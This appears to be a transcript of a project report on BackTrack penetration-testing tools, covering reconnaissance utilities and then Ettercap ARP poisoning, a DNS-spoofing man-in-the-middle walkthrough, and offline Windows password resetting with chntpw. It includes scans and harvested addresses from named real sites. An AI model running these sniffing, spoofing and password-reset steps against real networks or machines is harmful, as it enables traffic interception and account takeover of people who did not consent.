Backtrack Manual Part5

Project ReportProject Report

onon

Project by - Nutan Kumar Panda

Technology Evangelist ISEH

R&D - ATL Guwahati

Project By: Nutan Kumar Panda

BeEF is the browser exploitation framework. A professional tool to demonstrate the real-time impact of browser vulnerabilities. Development has focused on creating a modular structure making new module development a trivial process with the intelligence residing within BeEF. Current modules include the first public Inter-protocol Exploit, a traditional browser overflow exploit, port scanning, keylogging, clipboard theft and more. The modules are aimed to be a representative set of current browser attacks - with the notable exception of launching cross-site scripting viruses. You can download BeEF from Bindshell.net

Goorecon

In the Information Gathering stage of a pentest, we are interested in finding out the various sub-domains of our target domain. As we have seen in previous videos, querying DNS servers using zone transfer requests or trying to retrieve entries using a dictionary / brute-forcing attack, is a good start, but fails in most cases. Another alternate technique to figure out sub-domains is to query google and check if it has found any sub-domains during its web mining exercise on the target. Goorecon is just the tool we need in order to do this.

The syntax of Goorecon is very simple. Lets have a look at the options:

root@666:/pentest/enumeration/goorecon# ./goorecon.rb

Goorecon .01By Carlos PerezEmail: [email protected]

This is a simple tool writen for subdomain enumeration and email gatheringduring authorized penetration test engaments using Google.

USAGE:ruby goorecon.rb <type> <target>

TYPES:

-s Subdomoin Enumeration-e Email gathering

As you can see there are really only 2 options. One is to look for sub domains and the other is to look for emails.

Here is a example of using the tool to gather sub domains:

root@666:/pentest/enumeration/goorecon# ./goorecon.rb -s cnn.com


www.cnn.com,157.166.255.19www.cnn.com,157.166.255.18www.cnn.com,157.166.226.26www.cnn.com,157.166.226.25www.cnn.com,157.166.224.26www.cnn.com,157.166.224.25edition.cnn.com,157.166.226.45edition.cnn.com,157.166.226.46edition.cnn.com,157.166.255.31edition.cnn.com,157.166.255.32marquee.blogs.cnn.com,74.200.247.187marquee.blogs.cnn.com,76.74.255.117marquee.blogs.cnn.com,76.74.255.123marquee.blogs.cnn.com,72.233.104.123marquee.blogs.cnn.com,72.233.127.217marquee.blogs.cnn.com,74.200.247.59archives.cnn.com,157.166.224.110archives.cnn.com,157.166.226.110newsroom.blogs.cnn.com,72.233.104.123newsroom.blogs.cnn.com,72.233.127.217newsroom.blogs.cnn.com,74.200.247.59newsroom.blogs.cnn.com,74.200.247.187newsroom.blogs.cnn.com,76.74.255.117newsroom.blogs.cnn.com,76.74.255.123money.cnn.com,157.166.226.108money.cnn.com,157.166.226.109money.cnn.com,157.166.255.24money.cnn.com,157.166.255.25money.cnn.com,157.166.224.108money.cnn.com,157.166.224.109us.cnn.com,157.166.255.19us.cnn.com,157.166.224.25us.cnn.com,157.166.224.26us.cnn.com,157.166.226.25us.cnn.com,157.166.226.26us.cnn.com,157.166.255.18politicalticker.blogs.cnn.com,76.74.255.123politicalticker.blogs.cnn.com,72.233.104.123politicalticker.blogs.cnn.com,72.233.127.217politicalticker.blogs.cnn.com,74.200.247.59politicalticker.blogs.cnn.com,74.200.247.187politicalticker.blogs.cnn.com,76.74.255.117www.studentnews.cnn.com,157.166.226.112www.studentnews.cnn.com,157.166.224.112tech.fortune.cnn.com,72.233.69.6tech.fortune.cnn.com,74.200.243.251tech.fortune.cnn.com,74.200.244.59tech.fortune.cnn.com,76.74.254.120tech.fortune.cnn.com,76.74.254.123tech.fortune.cnn.com,72.233.2.58transcripts.cnn.com,157.166.226.110transcripts.cnn.com,157.166.224.110joybehar.blogs.cnn.com,72.233.104.123joybehar.blogs.cnn.com,72.233.127.217joybehar.blogs.cnn.com,74.200.247.59joybehar.blogs.cnn.com,74.200.247.187joybehar.blogs.cnn.com,76.74.255.117


joybehar.blogs.cnn.com,76.74.255.123pagingdrgupta.blogs.cnn.com,72.233.127.217pagingdrgupta.blogs.cnn.com,74.200.247.59pagingdrgupta.blogs.cnn.com,74.200.247.187pagingdrgupta.blogs.cnn.com,76.74.255.117pagingdrgupta.blogs.cnn.com,76.74.255.123pagingdrgupta.blogs.cnn.com,72.233.104.123ricksanchez.blogs.cnn.com,72.233.104.123ricksanchez.blogs.cnn.com,72.233.127.217ricksanchez.blogs.cnn.com,74.200.247.59ricksanchez.blogs.cnn.com,74.200.247.187ricksanchez.blogs.cnn.com,76.74.255.117ricksanchez.blogs.cnn.com,76.74.255.123sportsillustrated.cnn.com,157.166.224.105sportsillustrated.cnn.com,157.166.226.104sportsillustrated.cnn.com,157.166.226.105sportsillustrated.cnn.com,157.166.255.22sportsillustrated.cnn.com,157.166.255.23sportsillustrated.cnn.com,157.166.224.104insession.blogs.cnn.com,76.74.255.117insession.blogs.cnn.com,76.74.255.123insession.blogs.cnn.com,72.233.104.123insession.blogs.cnn.com,72.233.127.217insession.blogs.cnn.com,74.200.247.59insession.blogs.cnn.com,74.200.247.187behindthescenes.blogs.cnn.com,76.74.255.123behindthescenes.blogs.cnn.com,72.233.104.123behindthescenes.blogs.cnn.com,72.233.127.217behindthescenes.blogs.cnn.com,74.200.247.59behindthescenes.blogs.cnn.com,74.200.247.187behindthescenes.blogs.cnn.com,76.74.255.117newspulse.cnn.com,157.166.226.32newspulse.cnn.com,157.166.224.31newspulse.cnn.com,157.166.224.32newspulse.cnn.com,157.166.226.31tips.blogs.cnn.com,76.74.255.117tips.blogs.cnn.com,76.74.255.123tips.blogs.cnn.com,72.233.104.123tips.blogs.cnn.com,72.233.127.217tips.blogs.cnn.com,74.200.247.59tips.blogs.cnn.com,74.200.247.187afghanistan.blogs.cnn.com,74.200.247.187afghanistan.blogs.cnn.com,76.74.255.117afghanistan.blogs.cnn.com,76.74.255.123afghanistan.blogs.cnn.com,72.233.104.123afghanistan.blogs.cnn.com,72.233.127.217afghanistan.blogs.cnn.com,74.200.247.59weather.cnn.com,157.166.224.118weather.cnn.com,157.166.226.117weather.cnn.com,157.166.224.117news.blogs.cnn.com,72.233.69.6news.blogs.cnn.com,74.200.243.251news.blogs.cnn.com,74.200.244.59news.blogs.cnn.com,76.74.254.120news.blogs.cnn.com,76.74.254.123news.blogs.cnn.com,72.233.2.58weather.edition.cnn.com,157.166.224.118


weather.edition.cnn.com,157.166.226.117weather.edition.cnn.com,157.166.224.117inthefield.blogs.cnn.com,76.74.255.123inthefield.blogs.cnn.com,72.233.104.123inthefield.blogs.cnn.com,72.233.127.217inthefield.blogs.cnn.com,74.200.247.59

And here is a example of using Goorecon to grab email address’s:root@666:/pentest/enumeration/goorecon# ./goorecon.rb -e [email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]


[email protected]@[email protected]@[email protected]@emlouisville.edu

Dmitry

Dmitry or Deepmagic Information Gathering Tool is an all in one host information tool included in Backtrack 4’s Information Gathering section. Personally I prefer doing most info gathering using tools built into Linux however it is nice to run a tool like this in the background and come back later if you are multi-tasking.

Dmitry – Deepmagic Information Gathering Tool Details:

So Dmitry can perform numerous tasks based on the switches provided including a couple whois lookups, netcraft.com data (OS info, uptime info, web server info), subdomain search, email address search, and various TCP port scan options. As you can see letting this fly against a target host will return various information in one swoop. Below is an example using Dmitry against the louisville.edu domain/host.

Dmitry Example Against appinonline.com Domain/Host:

root@bt:/usr/local/bin# dmitry -winsepffb -o hosts.txt www.appinonline.comDeepmagic Information Gathering Tool"There be some deep magic going on"

Writing output to 'hosts.txt'

HostIP:75.126.45.217HostName:www.appinonline.com

Gathered Inet-whois information for 75.126.45.217---------------------------------

OrgName: SoftLayer Technologies Inc.OrgID: SOFTLAddress: 1950 N Stemmons FreewayCity: DallasStateProv: TXPostalCode: 75207Country: US

ReferralServer: rwhois://rwhois.softlayer.com:4321


NetRange: 75.126.0.0 - 75.126.255.255CIDR: 75.126.0.0/16OriginAS: AS36351NetName: SOFTLAYER-4-3NetHandle: NET-75-126-0-0-1Parent: NET-75-0-0-0-0NetType: Direct AllocationNameServer: NS1.ARPA.GLOBAL-DATACENTER.COMNameServer: NS2.ARPA.GLOBAL-DATACENTER.COMComment: [email protected]: 2006-05-12Updated: 2009-08-26

RAbuseHandle: ABUSE1025-ARINRAbuseName: AbuseRAbusePhone: +1-214-442-0605RAbuseEmail: [email protected]

RNOCHandle: IPADM258-ARINRNOCName: IP AdminRNOCPhone: +1-214-442-0600RNOCEmail: [email protected]

RTechHandle: IPADM258-ARINRTechName: IP AdminRTechPhone: +1-214-442-0600RTechEmail: [email protected]

OrgAbuseHandle: ABUSE1025-ARINOrgAbuseName: AbuseOrgAbusePhone: +1-214-442-0605OrgAbuseEmail: [email protected]

OrgTechHandle: IPADM258-ARINOrgTechName: IP AdminOrgTechPhone: +1-214-442-0600OrgTechEmail: [email protected]

# ARIN WHOIS database, last updated 2010-06-10 20:00# Enter ? for additional hints on searching ARIN's WHOIS database.## ARIN WHOIS data and services are subject to the Terms of Use# available at https://www.arin.net/whois_tou.html## Attention! Changes are coming to ARIN's Whois service on June 26.# See https://www.arin.net/features/whois for details on the improvements.

Gathered Inic-whois information for appinonline.com--------------------------------- Domain Name: APPINONLINE.COM Registrar: NET 4 INDIA LIMITED Whois Server: whois.net4domains.com Referral URL: http://www.net4.in


Name Server: NS3.IP01-DNS.NET Name Server: NS4.IP01-DNS.NET Status: ok Updated Date: 18-feb-2010 Creation Date: 30-may-2004 Expiration Date: 30-may-2018

>>> Last update of whois database: Fri, 11 Jun 2010 08:31:21 UTC <<<

The Registry database contains ONLY .COM, .NET, .EDU domains and

Gathered Netcraft information for www.appinonline.com---------------------------------

Retrieving Netcraft.com information for www.appinonline.comNo uptime reports available for host: www.appinonline.comNetcraft.com Information gathered

Gathered Subdomain information for appinonline.com---------------------------------Searching Google.com:80...HostName:www.appinonline.comHostIP:75.126.45.217HostName:delhi34.appinonline.comHostIP:75.126.45.217HostName:blog.appinonline.comHostIP:96.30.4.75HostName:punjabagh27.appinonline.comHostIP:75.126.45.217Searching Altavista.com:80...Found 4 possible subdomain(s) for host appinonline.com, Searched 0 pages containing 0 results

Gathered E-Mail information for appinonline.com---------------------------------Searching Google.com:80...Searching Altavista.com:80...Found 0 E-Mail(s) for host appinonline.com, Searched 0 pages containing 0 results

Gathered TCP Port information for 75.126.45.217---------------------------------

Port State

21/tcp open>> 220 FTP Server ready.

25/tcp open


>> 220 ip01-web5.net ESMTP

53/tcp open80/tcp open110/tcp open>> +OK <18937.1276245286@pop3>

143/tcp open>> * OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STA@î

Portscan Finished: Scanned 150 ports, 128 ports were in state closed

0trace

0trace is a security reconnaissance / firewall bypassing tool. This tool enables the user to perform hop enumeration ("traceroute") within an established TCP connection, such as a HTTP or SMTP session. This is opposed to sending stray packets, as traceroute-type tools usually do. The important benefit of using an established connection and matching TCP packets to send a TTL-based probe is that such traffic is happily allowed through by many stateful firewalls and other defenses without further inspection (since it is related to an entry in the connection table).

A good example of the difference is www.ebay.com (66.135.192.124) - a regular UDP/ICMP traceroute and tcptraceroute both end like this:

14 as-0-0.bbr1.SanJose1.Level3.net (64.159.1.133) ... 15 ae-12-53.car2.SanJose1.Level3.net (4.68.123.80) ... 16 * * * 17 * * * 18 * * *

Let's do the same using 0trace: we first manually telnet to 66.135.192.124 to port 80, then execute: './0trace.sh eth0 66.135.192.124', and finally enter 'GET / HTTP/1.0' (followed by a single, not two newlines) to solicit some client-server traffic but keep the session alive for the couple of seconds 0trace needs to complete the probe.

The output is as follows:

10 80.91.249.14 11 213.248.65.210 12 213.248.83.66 13 4.68.110.81 14 4.68.97.33 15 64.159.1.130 16 4.68.123.48


17 166.90.140.134 <--- 18 10.6.1.166 <--- new data 19 10.6.1.70 <--- Target reached.

The last three lines reveal firewalled infrastructure, including private addresses used on the inside of the company. This is obviously an important piece of information as far as penetration testing is concerned.

Of course, 0trace won't work everywhere and all the time. The tool will not produce interesting results in the following situations:

- Target's firewall drops all outgoing ICMP messages,

- Target's firewall does TTL or full-packet rewriting,

- There's an application layer proxy / load balancer in the way (Akamai, in-house LBs, etc),

- There's no notable layer 3 infrastructure behind the firewall.

The tool also has a fairly distinctive TCP signature, and as such, it can be detected by IDS/IPS systems.

Usage: /usr/local/sbin/0trace.sh iface target_ip [ target_port ]root@bt:~# ./0trace.py eth0 66.135.192.87 80bash: ./0trace.py: No such file or directoryroot@bt:~# /0trace.py eth0 hacking.appintraining.com 80bash: /0trace.py: No such file or directoryroot@bt:~# /usr/local/sbin/0trace.sh eth0 hacking.appintraining.com 800trace v0.01 PoC by <[email protected]>[+] Waiting for traffic from target on eth0...[+] Traffic acquired, waiting for a gap...[+] Target acquired: 192.168.0.208:53870 -> 66.98.135.161:80 (2989104564/3240623664).[+] Setting up a sniffer...[+] Sending probes...

TRACE RESULTS-------------


1 192.168.0.12 172.16.4.1Probe rejected by target.

Autoscan Networks

AutoScan-Network is a network scanner (discovering and managing application). No configuration is required to scan your network. The main goal is to print the list of connected equipments in your network.AutoScan is an application designed to explore and to manage your network. Entire subnets can be scanned simultaneously without human intervention. The objective of the program is to post the list of all equipment connected to the network. A list of ports preset is scanned for each equipment.1. Fast multithreaded scanning2. Automatic network discovery3. Extreme Low Bandwidth4. Entire subnets can be scanned simultaneously without human intervention5. Addition time-reality of the new machines put on the network6. Monitoring of equipment (router, server, firewall, ...)7. Monitoring of network services (smtp, http, pop, ...)8. Detection of the OS, brand and model known (Possibility to add an unknown equipment in the database)

SslscanSSLScan is a fast SSL service scanner. It determines which ciphers are supported, the preferred ciphers, and the service certificate. The project is also possible to supply a certificate and private key to use with a connection.

Build:sslscan can be built manually using the following command:gcc -lssl -o sslscan sslscan.c

The command line arguements for SSLScan are:sslscan [Options] [host:port | host]

Options:

--targets=< file > A file containing a list of hosts to check. Hosts can be supplied with ports (i.e.host:port).--no-failed List only accepted ciphers (default is to listing all ciphers).--ssl2 Only check SSLv2 ciphers.--ssl3 Only check SSLv3 ciphers.--tls1 Only check TLSv1 ciphers.


--pk=< file > A file containing the private key or a PKCS#12 file containing a private key/certificate pair (as produced by MSIE and Netscape).--pkpass=< password > The password for the private key or PKCS#12 file.--certs=< file > A file containing PEM/ASN1 formatted client certificates.--xml=< file > Output results to an XML file.--version Display the program version.--help Display the help text you are now

Example

root@bt:~# sslscan -xml=/etc/lloo.txt appinonline.com _ ___ ___| |___ ___ __ _ _ __ / __/ __| / __|/ __/ _` | '_ \ \__ \__ \ \__ \ (_| (_| | | | | |___/___/_|___/\___\__,_|_| |_|

Version 1.6 http://www.titania.co.uk Copyright (C) 2007-2008 Ian Ventura-Whiting

Testing SSL server appinonline.com on port 443

Supported Server Cipher(s): Accepted SSLv2 168 bits DES-CBC3-MD5 Accepted SSLv2 56 bits DES-CBC-MD5 Accepted SSLv2 40 bits EXP-RC2-CBC-MD5 Accepted SSLv2 128 bits RC2-CBC-MD5 Accepted SSLv2 40 bits EXP-RC4-MD5 Accepted SSLv2 128 bits RC4-MD5 Rejected SSLv3 256 bits ADH-AES256-SHA Accepted SSLv3 256 bits DHE-RSA-AES256-SHA Rejected SSLv3 256 bits DHE-DSS-AES256-SHA Accepted SSLv3 256 bits AES256-SHA Rejected SSLv3 128 bits ADH-AES128-SHA Accepted SSLv3 128 bits DHE-RSA-AES128-SHA Rejected SSLv3 128 bits DHE-DSS-AES128-SHA Accepted SSLv3 128 bits AES128-SHA Rejected SSLv3 168 bits ADH-DES-CBC3-SHA Rejected SSLv3 56 bits ADH-DES-CBC-SHA Rejected SSLv3 40 bits EXP-ADH-DES-CBC-SHA Rejected SSLv3 128 bits ADH-RC4-MD5 Rejected SSLv3 40 bits EXP-ADH-RC4-MD5 Accepted SSLv3 168 bits EDH-RSA-DES-CBC3-SHA Accepted SSLv3 56 bits EDH-RSA-DES-CBC-SHA Accepted SSLv3 40 bits EXP-EDH-RSA-DES-CBC-SHA Rejected SSLv3 168 bits EDH-DSS-DES-CBC3-SHA Rejected SSLv3 56 bits EDH-DSS-DES-CBC-SHA Rejected SSLv3 40 bits EXP-EDH-DSS-DES-CBC-SHA Accepted SSLv3 168 bits DES-CBC3-SHA Accepted SSLv3 56 bits DES-CBC-SHA Accepted SSLv3 40 bits EXP-DES-CBC-SHA Accepted SSLv3 40 bits EXP-RC2-CBC-MD5 Accepted SSLv3 128 bits RC4-SHA


Accepted SSLv3 128 bits RC4-MD5 Accepted SSLv3 40 bits EXP-RC4-MD5 Rejected SSLv3 0 bits NULL-SHA Rejected SSLv3 0 bits NULL-MD5 Rejected TLSv1 256 bits ADH-AES256-SHA Accepted TLSv1 256 bits DHE-RSA-AES256-SHA Rejected TLSv1 256 bits DHE-DSS-AES256-SHA Accepted TLSv1 256 bits AES256-SHA Rejected TLSv1 128 bits ADH-AES128-SHA Accepted TLSv1 128 bits DHE-RSA-AES128-SHA Rejected TLSv1 128 bits DHE-DSS-AES128-SHA Accepted TLSv1 128 bits AES128-SHA Rejected TLSv1 168 bits ADH-DES-CBC3-SHA Rejected TLSv1 56 bits ADH-DES-CBC-SHA Rejected TLSv1 40 bits EXP-ADH-DES-CBC-SHA Rejected TLSv1 128 bits ADH-RC4-MD5 Rejected TLSv1 40 bits EXP-ADH-RC4-MD5 Accepted TLSv1 168 bits EDH-RSA-DES-CBC3-SHA Accepted TLSv1 56 bits EDH-RSA-DES-CBC-SHA Accepted TLSv1 40 bits EXP-EDH-RSA-DES-CBC-SHA Rejected TLSv1 168 bits EDH-DSS-DES-CBC3-SHA Rejected TLSv1 56 bits EDH-DSS-DES-CBC-SHA Rejected TLSv1 40 bits EXP-EDH-DSS-DES-CBC-SHA Accepted TLSv1 168 bits DES-CBC3-SHA Accepted TLSv1 56 bits DES-CBC-SHA Accepted TLSv1 40 bits EXP-DES-CBC-SHA Accepted TLSv1 40 bits EXP-RC2-CBC-MD5 Accepted TLSv1 128 bits RC4-SHA Accepted TLSv1 128 bits RC4-MD5 Accepted TLSv1 40 bits EXP-RC4-MD5 Rejected TLSv1 0 bits NULL-SHA Rejected TLSv1 0 bits NULL-MD5

Prefered Server Cipher(s): SSLv2 168 bits DES-CBC3-MD5 SSLv3 256 bits DHE-RSA-AES256-SHA TLSv1 256 bits DHE-RSA-AES256-SHA

SSL Certificate: Version: 2 Serial Number: 966173 Signature Algorithm: sha1WithRSAEncryption Issuer: /C=US/O=Equifax/OU=Equifax Secure Certificate Authority Not valid before: Jan 10 18:50:39 2010 GMT Not valid after: Feb 11 14:22:03 2011 GMT Subject: /serialNumber=mVSeVz4nkJ-qQhthu31BiNHsyKIrLvpX/C=US/O=secure.ip01-web3.net/OU=GT49606253/OU=See www.rapidssl.com/resources/cps (c)10/OU=Domain Control Validated - RapidSSL(R)/CN=secure.ip01-web3.net Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:ba:1d:b7:04:73:23:d3:e7:de:29:46:90:6b:99: 79:4f:c2:53:23:63:73:8d:e9:d7:2f:58:a5:96:d9:


4c:80:ca:31:48:c9:d1:4c:b9:4c:7c:08:7c:74:85: de:53:1a:a3:99:38:89:35:74:20:17:eb:4b:6d:e6: b9:ff:3a:8c:e2:40:e5:b7:3c:9d:84:3d:0f:87:5b: f7:a8:b4:22:2b:88:bc:f9:52:35:ba:7b:75:49:b1: d7:2a:f8:65:a3:ce:87:4b:fe:0a:30:53:2c:32:ed: 8c:37:f4:c9:c7:3c:a7:3c:c1:00:65:c4:49:eb:bd: 02:75:90:b2:c3:71:8f:f2:6d Exponent: 65537 (0x10001) X509v3 Extensions: X509v3 Key Usage: critical Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment X509v3 Subject Key Identifier: FF:6C:2E:6C:1F:22:B7:15:9C:1A:8F:8B:7A:69:FF:3C:A8:70:10:C0 X509v3 CRL Distribution Points: URI:http://crl.geotrust.com/crls/secureca.crl

X509v3 Authority Key Identifier: keyid:48:E6:68:F9:2B:D2:B2:95:D7:47:D8:23:20:10:4F:33:98:90:9F:D4

X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication Verify Certificate: unable to get local issuer certificate

NBTScan

NBTscan is a program for scanning IP networks for NetBIOS name information. It sends NetBIOS status query to each address in supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address.NBTscan compiles and runs on Unix and Windows. I have tested it on Windows NT 4.0, Windows 2000, FreeBSD 4.3, OpenBSD 2.8 and RedHat Linux 7.1 and 7.3. It should also compile and run on Solaris and other Linuxes as well.

This program is a successor of a perl script with the same name and does essentially the same thing, being much faster though. NBTscan produces a report like that:

IP address NetBIOS Name Server User MAC address--------------------------------------------------------------192.168.1.2 MYCOMPUTER JDOE 00-a0-c9-12-34-56192.168.1.5 WIN98COMP RROE 00-a0-c9-78-90-00192.168.1.123 DPTSERVER ADMINISTRATOR 08-00-09-12-34-56

First column lists IP address of responded host. Second column is computer name. Third column indicates if this computer shares or is able to share files or printers. For NT machine it means that Server Service is running on this computer.Most often it means that this computer shares files. Third column shows user name. If no one is logged on from this computer it is same as computer name. Last column shows adapter MAC


address.If run with -v switch NBTscan lists whole NetBIOS name table for each responded address. The output looks like that:

NetBIOS Name Table for Host 192.168.1.123:

Name Service Type----------------------------------------DPTSERVER < 00 > UNIQUEDPTSERVER < 20 > UNIQUEDEPARTMENT < 00 > GROUPDEPARTMENT < 1c > GROUPDEPARTMENT < 1b > UNIQUEDEPARTMENT < 1e > GROUPDPTSERVER < 03 > UNIQUEDEPARTMENT < 1d > UNIQUE??__MSBROWSE__? < 01 > GROUPINet~Services < 1c > GROUPIS~DPTSERVER < 00 > UNIQUEDPTSERVER < 01 > UNIQUE

Adapter address: 00-a0-c9-12-34-56

Unicornscan

Unicornscan is a new information gathering and correlation engine built for and by members of the security research and testing communities. It was designed to provide an engine that is Scalable, Accurate, Flexible, and Efficient. It is released for the community to use under the terms of the GPL license.

Benefits:

Unicornscan is an attempt at a User-land Distributed TCP/IP stack. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Although it currently has hundreds of individual features, a main set of abilities include:

Asynchronous stateless TCP scanning with all variations of TCP Flags.


Asynchronous stateless TCP banner grabbing Asynchronous protocol specific UDP Scanning (sending enough of a signature to elicit a

response). Active and Passive remote OS, application, and component identification by analyzing

responses. PCAP file logging and filtering Relational database output Custom module support Customized data-set views

chntpw

chntpw is a Linux utility to (re)set the password of any user that has a valid (local) account on your WinNT or Win2000 system, by modifying the crypted password in the registry's SAM file. You do not need to know the old password to set a new one. It works offline (i.e., you have to shutdown your computer and boot off a linux floppy disk). The bootdisk includes stuff to access NTFS partitions and scripts to glue the whole thing together. This utility works with SYSKEY and includes the option to turn it off. After thats all done u need to get into the...

Code:cd /mnt/Your hard folder/Windows/System32/config

While your still in your Windows/system32/config directory type this command this is how mine looked like

Code:root@Expl0it3:/mnt/sda1/Windows/System32/config# chntpw -i sam

Ettercap

Another great tool is Ettercap, the Swiss army knife of ARP Poisoning and password sniffing. I usually use it in non-interactive mode, but by default it has a ncurses interface that some may find easier to use. If you would like to use Ettercap for ARP poisoning instead, the following commands should serve as good examples. If we wanted to target all hosts on the network and sniff traffic between every node, we would use the following command:

ettercap -T -q -M ARP // //


Or

ettercap -T –q -p -M ARP // //

Be careful with the above command, having all of the traffic on a large network going though one slow computer can really bog down network connections. If we had a specific victim in mind, let's say a host with the IP 192.168.1.1, we would use this command:

ettercap -T -q -M ARP /192.168.1.1/ //

or

ettercap -T -q –p -M ARP // //

If 192.168.1.1 is the gateway, we should be able to see all outgoing traffic. Here are what the command line option flags do:

-T tells Ettercap to use the text interface, I like this option the best as the more GUI modes are rather confusing.-q tells Ettercap to be more quiet, in other words less verbose.

-p not to change interface.-M tells Ettercap the MITM (Man in the Middle) method we want to use, in this case ARP poisoning.

DNS Spoofing with Ettercap & BackTrack

Fire up a terminal (little black box in the bottom left) and enter:/etc/init.d/networking start

Prepare Apache

BackTrack is now online and ready to go, but we need to get the webserver ready to accept whatever domain we throw at it using our DNS Spoofing.

You’ll need to run pico /etc/apache2/sites-available/default in the terminal and add a line below ‘ServerAdmin webmaster@localhost’:


ServerAdmin webmaster@localhost

ServerAlias *DocumentRoot /var/www/

This is specifying that whatever domain pointed to the webserver is to show the default web content at /var/www.

We just need to restart Apache for it to take effect:

/etc/init.d/apache2 restart

Apache is ready.

Mounting the Attack

Open the little BackTrack icon in the bottom left (start menu type situation) and pick BackTrack –> Privilege Escalation –> Sniffers –> Ettercap GTK:


http://gregularexpressions.files.wordpress.com/2010/04/screen-shot-2010-04-12-at-18-53-38.jpg

Select Sniff –> Unified Sniffing:

Then click ‘OK’ on the interface it selects

Next select Hosts –> Scan for hosts. It will scan your local network for active machines. Then select Hosts –> Hosts List.



Now we need to know the IP of the network’s gateway and your victims IP address. These are reasonably simply found.

To figure out the network gateway head back to the terminal and enter route -n:

You’ll notice gateway is 192.168.1.1, now to find our target.



To track them down you’ll need to know some defining feature, particular OS or service (maybe with a banner you could check?)

In my case the target is a Windows XP machine. I used Zenmap (nmap GUI) on each of the IPs to OS fingerprint them and find my target:

Target established we need to setup the DNS Spoof plugin in Ettercap to behave how we’d like, back in the terminal enter pico /usr/share/ettercap/etter.dns.

Head down to where it starts mentioning Microsoft’s domains and enter something like the below, where google.co.uk is the domain you want to spoof and 192.168.1.7 is the BackTrack machine’s IP (ifconfig in terminal to find out):



Now then, back to Ettercap.

Make the gateway ‘Target 1′ and the target machine ‘Target 2′, then click Plugins –> Manage Plugins and double click on the Spoof DNS plugin:

Next go to Mitm –> Arp Poisoning, tick ‘Sniff Remote Connections’ and click ok. Then click Start –> Start Sniffing.

Head to the victim machine and try going to your DNS Spoofed domain, in my case google.co.in:


Backtrack Manual Part5

Education

Transcript of Backtrack Manual Part5